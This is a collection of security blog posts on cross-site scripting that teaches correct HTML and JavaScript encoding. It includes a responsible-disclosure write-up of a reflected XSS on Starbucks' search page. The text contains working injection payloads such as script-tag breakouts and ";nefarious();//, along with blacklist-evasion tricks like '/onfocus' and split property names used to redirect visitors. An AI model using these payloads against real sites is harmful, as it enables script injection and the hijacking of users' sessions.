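You can watch this happen with a harmless stand-in for window.open; nefarious() below is a made-up placeholder, not anything from the original page:

```javascript
let called = false;
// Stand-in for window.open(...): records that it ran, returns something numeric
function nefarious() { called = true; return 0; }

// The injected assignment: both operands of each "-" are evaluated
// before JavaScript discovers the arithmetic is nonsense.
const prop2 = "" - nefarious() - "";

console.log(called); // true: the function ran despite the bogus subtraction
console.log(prop2);  // 0
```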
A data attribute is an attribute in an HTML tag, whose name begins with the word "data" and a hyphen.
These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.
Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.
Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only a few quoting rules to consider:
1. Surround the value with double quotes.
2. Ampersand ("&") characters need to be HTML encoded to "&amp;".
3. Double quote (") characters need to be HTML encoded to "&quot;".
Rules 2 & 3 can simply be replaced with "HTML encode everything in the value other than alphanumerics" before applying rule 1, and if that's easier, do that.
HTML parses attribute value strings very simply – look for the first non-space character after the "=" sign, which is either a quote or not a quote. If it's a quote, find another one of the same kind, HTML-decode what's in between them, and that's the attribute's value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you're right:
- <a onclick="prompt("1")"></a>
- <a onclick = "prompt( 1 )"></a>
- <a onclick= prompt( 1 ) ></a>
- <a onclick= prompt(" 1 ") ></a>
- <a onclick= prompt( "1" ) ></a>
- <a onclick=&#9;"prompt( 1 )"></a>
- <a onclick=&#32;"prompt( 1 )"></a>
- <a onclick= thing=1;prompt(thing)></a>
- <a onclick="prompt(\"1\")"></a>
Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?
Here's how they look in the Debugger in Internet Explorer 11:
Uh… That's not right, particularly line 8. Clearly syntax colouring in IE11's Debugger window needs some work.
OK, let's try the DOM Explorer:
Much better – note how the DOM explorer reorders some of these attributes, because it's reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).
Other browsers have similar capabilities, of course – use whichever one works for you.
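The attribute-value rule above can be sketched in a few lines of JavaScript. This is my own simplified model for illustration, not the real parser (it ignores tab/newline whitespace and entity decoding, among other things):

```javascript
// Simplified model of HTML attribute-value parsing: after "=", skip spaces;
// a quoted value runs to the matching quote, an unquoted one to the next space.
function parseAttrValue(s, eqIndex) {
  let i = eqIndex + 1;
  while (s[i] === ' ') i++;
  const q = s[i];
  if (q === '"' || q === "'") {
    const end = s.indexOf(q, i + 1);   // first matching quote ends the value
    return s.slice(i + 1, end);
  }
  const end = s.indexOf(' ', i);       // unquoted value ends at a space
  return end === -1 ? s.slice(i) : s.slice(i, end);
}

const tag = '<a onclick="prompt("1")">';
console.log(parseAttrValue(tag, tag.indexOf('='))); // prompt(
```

Note how the inner quote ends the value early, which is exactly why the first example in the list prompts nothing.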
Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.
So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named "data-something-or-other".
Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you're operating inside of an event handler, you can simply use the "this" object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).
If you're not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)
Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what's returned is a string – and any HTML encoding in the data-attribute will have been decoded once.
Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a ".data(…)" function which will fetch a data attribute's value.
I've noted before that stopping XSS is a "simple" matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.
If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That's a lot easier than trying to understand multiple injection contexts, each with its own encoding function. It's a lot easier to protect the inclusion of arbitrary user data in your web pages, and you'll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn't a bad thing at all.
You can still kick your own arse.
When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?
Please don't say "eval".
Eval is evil. Just like innerHTML and document.write, its use is an invitation to Cross-Site Scripting.
Use parseFloat() and parseInt(), because they won't evaluate function calls or other nefarious components in your strings.
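The difference is easy to demonstrate; nefarious() and attack() here are just illustrative names:

```javascript
// parseInt/parseFloat read leading numeric characters and stop at the first
// character that can't belong to a number -- nothing ever gets executed.
console.log(parseInt("42;nefarious()", 10));  // 42
console.log(parseFloat("3.14;attack()"));     // 3.14
console.log(parseInt("nefarious()", 10));     // NaN

// eval("42;nefarious()") would have run the attacker's code instead.
```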
So, now I'm hoping your Omniture script looks like this:
<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>
You didn't forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?
P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.
Last time in this series, I posted an example where XSS was possible because a site's developer was unaware of the implications of his JavaScript being hosted inside of HTML.
This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc.) methods don't always apply to HTML.
I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.
The context dictates what encoding you need, whether the context is "JavaScript string", "JavaScript code", "HTML attribute", "HTML content", "URL", "CSS expression", etc., etc.
In the case of HTML attributes, it's actually fairly simple.
Unless you are putting a URL into an attribute, there are three simple rules:
Seems easy, right?
This is all kinds of good, except when you run into a site where the developer hasn't really thought about their encoding very well.
You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.
To HTML, the back-slash has no particular meaning.
I see this all the time – I want to inject script, but the site only lets me put user data into an attribute value:
<meta name="keywords" content="Wot I searched for">
That's lovely. I'd like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:
<meta name="keywords" content=""><script>prompt(1)</script>">
The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:
<meta name="keywords" content="\"><script>prompt(1)</script>">
Nice try, Charlie, but that back-slash, it's just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your "fix" got broken as soon as you released it.
Oh, if only you had chosen the correct HTML encoding, and replaced my quote with "&quot;" [and therefore, also replaced every "&" in my query with "&amp;"], we'd be happy.
And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security team's guidance.
Exercise for the reader – how do you exploit this example if I don't encode the quotes, but I do strip out angle brackets?
I saw this again today. I tried smiling, but could only manage a weak grin.
You think you've defeated my XSS attack. How did you do that?
Sure, I can no longer turn this:
<script> s_prop0="[user-input here]"; </script>
into this, by providing user input that consists of ";nefarious();//
:
<script> s_prop0="";nefarious();//"; </script>
Instead, I get this:
<script> s_prop0="\";nefarious();//"; </script>
But, and this surprises many web developers, if that's all you've done, I can still close that script tag.
INSIDE THE STRING
Yes, that's bold, italic and underlined, because developers see this, and think "I have no idea how to parse this":
<script> s_prop0="</script><script>nefarious();</script>"; </script>
Fortunately, your browser does.
First it parses it as HTML.
This is important.
The HTML parser knows nothing about your JavaScript, it uses HTML rules to parse HTML bodies, and to figure out where scripts start and end.
So, when the HTML parser sees "<script>", it creates a buffer. It starts filling that buffer with the first character after the tag, and it ends it with whatever character precedes the very next "</script>" tag it sees.
This means the HTML above gets interpreted as:
1. a block of script that won't run, because it's not complete code and generates a syntax error.
s_prop0="
2. a block of script that will run, because it parses properly.
nefarious();
3. a double-quote character, a semi-colon, and an unnecessary end tag that it discards
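You can mimic the HTML parser's view of this with a simple split, which is roughly what the buffer-filling rule above amounts to:

```javascript
// The HTML parser ends a script block at the very next "</script>",
// regardless of JavaScript string syntax. Splitting on the end tag
// shows the pieces the browser sees.
const page = '<script> s_prop0="</script><script>nefarious();</script>"; </script>';
const pieces = page.split('</script>');

console.log(pieces[0]); // <script> s_prop0="    -> incomplete, syntax error, never runs
console.log(pieces[1]); // <script>nefarious();  -> parses fine, runs
console.log(pieces[2]); // ";                    -> leftover text
```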
Obviously, your code is more complex than mine, so this kind of injection has all kinds of nasty effects – but it's possible for an attacker to hide those (not that the attacker needs to!)
If you truly have to insert data from users into a JavaScript string, remember what it's embedded in – HTML.
There are three approaches:
What are you embedded in? A JavaScript string embedded in HTML. You can't HTML-encode your JavaScript content (try it and you'll see it doesn't work that way), so you have to JavaScript-string-encode anything that might make sense either to the HTML parser OR the JavaScript parser.
You know I don't like blacklists, but in this case, the only characters you actually need to encode are the double-quote, the back-slash (because otherwise you can't uniquely reverse the encoding), and either the less-than or forward-slash.
But, since I don't like blacklists, I'd rather you chose to encode everything other than alphanumerics and spaces – it doesn't cost that much.
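A sketch of that "encode everything other than alphanumerics and spaces" approach for the JavaScript-string context – my own illustration, handling one UTF-16 code unit at a time, which is fine for a demo:

```javascript
// Whitelist approach: alphanumerics and spaces pass through; everything else
// becomes a \xHH or \uHHHH escape, meaningless to both the HTML parser and
// the JavaScript parser when it lands inside a quoted string.
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, c => {
    const hex = c.charCodeAt(0).toString(16);
    return hex.length <= 2 ? '\\x' + hex.padStart(2, '0')
                           : '\\u' + hex.padStart(4, '0');
  });
}

console.log(jsStringEncode('</script><script>nefarious();</script>'));
// \x3c\x2fscript\x3e\x3cscript\x3enefarious\x28\x29\x3b\x3c\x2fscript\x3e
```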
Give it an id, and the JavaScript can reference it by that id. This means you only have to protect the user-supplied data in one place, and it won't appear a dozen times throughout the document.
OK, aside from last weekend's post, where I demonstrated how a weak blacklist is no defence, it's important to remember that the web changes day by day. Not every browser is standard, and they each try to differentiate themselves from the other browsers by introducing "killer features" that the other browsers don't have for a few weeks.
As a result, you can't really rely on the HTML standard as the one true documentation of all things a browser may do to your code.
Tags change; who knows if tomorrow a <script> tag might not be "pausable" by a <pause>Some piece of text</pause> tag? Ludicrous, maybe, until someone decides it's a good idea. Or something else.
As a result, if you want to be a robust developer who produces robust code, you need to think less in terms of "what's the minimum I have to encode?", and more in terms of "what's the cost of encoding, and what's the cost of failure if I don't encode something that needs it?"
I've been playing a lot lately with cross-site scripting (XSS) – you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.
Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.
And to a certain extent, that's deserved.
But I always report what I find, and I don't blog about it until I'm sure the company has fixed the issue.
Right, and having known a few people who've worked in the Starbucks security team, I was surprised that I could find anything at all.
Yet it practically shouted at me, as soon as I started to inject script:
Well, there's pretty much a hint that Starbucks have something in place to prevent script.
But it's not the only thing preventing script, as I found with a different search:
So, one search takes me to an "oops" page, another takes me to a page telling me that nothing happened – but without either one executing the script.
The oops page doesn't include any of my script, so I don't like that page – it doesn't help my injection at all.
The search results page, however, includes some of my script, so if I can just make that work for me, I'll be happy.
Viewing source is pretty helpful, so here's what I get from that, plus searching for my injected script:
So, while my intended JavaScript, "-prompt(1)-", is not executed, and indeed is in the wrong context to be executed, every character has successfully made it into the source sent back to the user's browser.
At this point, I figure that I need to find some execution that is appropriate for this context.
Maybe the XSS fish will help, so I search for that:
Looks promising – no "oops", let's check the source:
This is definitely working. At this point, I know the site has XSS, I just have to demonstrate it. If I was a security engineer at Starbucks, this would be enough to cause me to go beat some heads about.
This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all we're debating about is how much I can do now that I've broken in.
I have to go on at this point, because I'm an external researcher to this company. I have to deliver to them a definite breach, or they'll probably dismiss me as a waste of time.
The obvious thing to inject here is ""><script>prompt(1)</script>" – but we saw earlier that produced an "oops" page. We've seen that "prompt(1)" isn't rejected, and the angle-brackets (chevrons, less-than / greater-than signs, etc., whatever you want to call them) aren't rejected, so it must be the word "script".
That, right there, is enough to tell me that instead of encoding the output (which would turn those angle-brackets into "&lt;" and "&gt;" in the source code, while still looking like angle-brackets in the display), this site is using a blacklist of "bad words to search for".
That's a really good question – and the basic answer is because you just can't make most blacklists complete. Only if you have a very limited character set, and a good reason to believe that your blacklist can be complete.
A blacklist that might work is to say that you surround every HTML tagâs attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.
I say it "might work", because in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.
Easier by far to use a whitelist – only these few characters are safe, and ALL the rest get encoded.
You might have an incomplete whitelist, but that's easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.
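For HTML contexts, the same whitelist philosophy looks like this – again a sketch of my own, using numeric entities so there is no list of special characters to get wrong:

```javascript
// Whitelist encoder for HTML text/attribute values: alphanumerics and spaces
// pass through, everything else becomes a numeric character reference.
function htmlEncode(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, c => '&#' + c.charCodeAt(0) + ';');
}

console.log(htmlEncode('"><script>prompt(1)</script>'));
// &#34;&#62;&#60;script&#62;prompt&#40;1&#41;&#60;&#47;script&#62;
```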
OK, so having determined that I can't use the script tag, maybe I can add an event handler to the tag I'm in the middle of displaying, whether it's a link or an input. Perhaps I can get that event handler to work.
Ever faithful is the "onmouseover" event handler. So I try that.
You don't need to see the "oops" page again. But I did.
The weirdest thing, though, is that the "onmooseover" event worked just fine.
Except I didn't have a moose handy to demonstrate it executing.
So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasn't.
Similarly, "onfocus" triggered the "oops" page, but "onficus" didn't. Again, sadly I didn't have a ficus with me.
Sure, but then so is the community of browser manufacturers. There's a range of "ontouch" events that weren't on the blacklist, but are supported by a browser or two – and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce "onwaveat". Again, the blacklist isn't future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.
Then I tried adding characters to the beginning of the event name. Curious – that works.
And, yes, the source view showed me the event was being injected. Of course, the browser wasn't executing it, because of course, "?onmouseover" can't be executed. The HTML spec just doesn't allow for it.
Eventually, I made my way through the ASCII table to the forward-slash character.
Yes, that's it, that executes. There's the prompt.
Weirdly, if I used "alert" instead of "prompt", I got the "oops" page. Clearly, "alert" is on the blacklist and "prompt" is not.
I still want to make this a "hotter" report before I send it off to Starbucks, though.
Well, it'd be nice if it didn't require the user to find and wave their mouse over the page element that you've found the flaw in.
Fortunately, I'd also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And there's an "onfocus" event I can trigger with "/onfocus".
So, there we are: automated execution of my chosen code.
Sure, how about something an attacker might try: a redirect to a site of their choosing. [But since I'm not an attacker, we'll do it to somewhere acceptable.]
I tried to inject onfocus='document.location="//google.com"', but apparently "document" and "location" are also on the banned list.
"ownerDocu", "ment", "loca" and "tion" aren't on the blacklist, so I can do this["ownerDocu"+"ment"]["loca"+"tion"]= …
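That trick works because JavaScript lets you reach any property by a computed name, so a filter scanning the input for the literal strings "document" and "location" never sees them; they only exist once the browser concatenates the pieces at runtime. A minimal sketch of the principle, runnable under Node with a stand-in object in place of the live DOM:

```javascript
// A stand-in object instead of a live DOM element; names are illustrative only.
const element = {
  ownerDocument: { location: "https://example.com/" },
};

// Direct access: this is the spelling a substring blacklist matches against.
const direct = element.ownerDocument.location;

// Assembled at runtime: the literal strings "ownerDocument" and "location"
// never appear in the source, so a filter scanning for them sees nothing.
const assembled = element["ownerDocu" + "ment"]["loca" + "tion"];

console.log(direct === assembled); // true: both reach the same property
```

This is why substring blacklists can't keep up: the set of equivalent spellings of any property access is effectively unbounded.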
Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.
Now it's ready to report.
Well, no, not really. This took me a couple of months to get reported. I tried "security@starbucks.com", which is the default address for reporting security issues.
An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.
I try the webmaster@ address, and that gets me nowhere.
The "Contact Us" link takes me to a customer service representative, and an entertaining exchange that results in them telling me that they've passed my email around everyone who's interested, and the general consensus is that I should go ahead and publish my findings.
No, I'm not interested in self-publicising at the cost of someone else's security. I do this so that things get more secure, not less.
So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.
The Information Security team works with me politely, quickly and calmly, and addresses the problem completely. The blacklist is still there, and still takes you to the "oops" page, but it's no longer the only protection in place.
My "onmooseover" and "onficus" events no longer work, because the correct characters are quoted and encoded.
The world is made safer and more secure, and half a year later, I post this article, so that others can learn from this experience, too.
By withholding publishing until well after the site is fixed, I ensure that I'm not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.
The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.
And did I ever tell you about the time I got onto Google's hall of fame?
I've found a new weekend hobby: it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.
I open my favourite search engine (I'm partial to Bing, partly because I get points, but mostly because I've met the guys who built it), search for "security blog", and then pick one at random.
Once I'm at the security blog site, often one I've never heard of, despite it being high up in the search results, I find the search box and throw a simple reflected XSS attack at it.
If that doesn't work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.
[Note: I use reflected XSS, because I know I can only hurt myself. I don't play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I'm being paid.]
Finally, I try to find who I should contact about the exploitability of the site.
It's interesting just how many of these sites are exploitable, some of them falling to the simplest of XSS attacks, and even more interesting to see how many sites don't have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).
I clearly wouldn't dream of disclosing any of the vulnerabilities I've found until well after they're fixed. Of course, after they're fixed, I'm happy to see a mention that I've helped move the world forward a notch on some security scale. [Not sure why I'm not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.
From clicking the link to exploit is either under ten minutes or not at all, and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.
You can try using a WAF to solve your XSS problem, but then you've got two problems: a vulnerable web site, and a set of WAF rules you now have to manage. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesn't ever fix the problem.
If you can, don't echo back to me what I sent you, because that's how these attacks usually start. Don't even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.
Unless you're running a source code site, you probably don't need me to search for angle brackets, or a number of other characters. So take them out of my search, or plainly reject my search if it includes them.
OK, so you don't have to encode the basics. What are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.
Yeah, that's always the hard part. Encode it using the right encoding. That's the short version. The long version is that you figure out what's going to decode it, and make sure you encode for every layer that will decode. If you're putting my text into a web page as a part of the page's content, HTML encode it. If it's in an attribute string, quote the characters using HTML attribute encoding, and make sure you quote the entire attribute value! If it's an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.
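A sketch of those layers using Python's standard library; the payload and variable names are mine for illustration, not any particular site's code:

```python
import html
from urllib.parse import quote

payload = '"><script>confirm(1)</script>'

# Page content: HTML-encode so markup in the input is displayed, not parsed.
as_content = html.escape(payload, quote=False)

# Attribute value: encode the quotes as well, and quote the whole attribute.
as_attribute = 'value="%s"' % html.escape(payload, quote=True)

# Attribute used as a URL: URL-encode for the URL layer first, then
# HTML-encode the result for the layer that parses the attribute.
as_url_attribute = 'href="%s"' % html.escape(quote(payload), quote=True)

print(as_content)
print(as_attribute)
print(as_url_attribute)
```

The ordering matters: each decoder peels off one layer, so you encode in the reverse order of the decoding, innermost context first.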
[Then, of course, check that your encoding hasn't killed the basic function of the search box!]
You should definitely respond to security reports. I understand that not everyone can have a 24/7 response team watching their blog (I certainly don't), but you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don't get a response much sooner, and see that as cause to publish their findings.
Me, I send a message first to ask if I've found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.
I've said before that I wish programmers would respond to reports of XSS as if I'd told them I'd caught them writing a bubble sort implementation in COBOL: full of embarrassment at being such a beginner.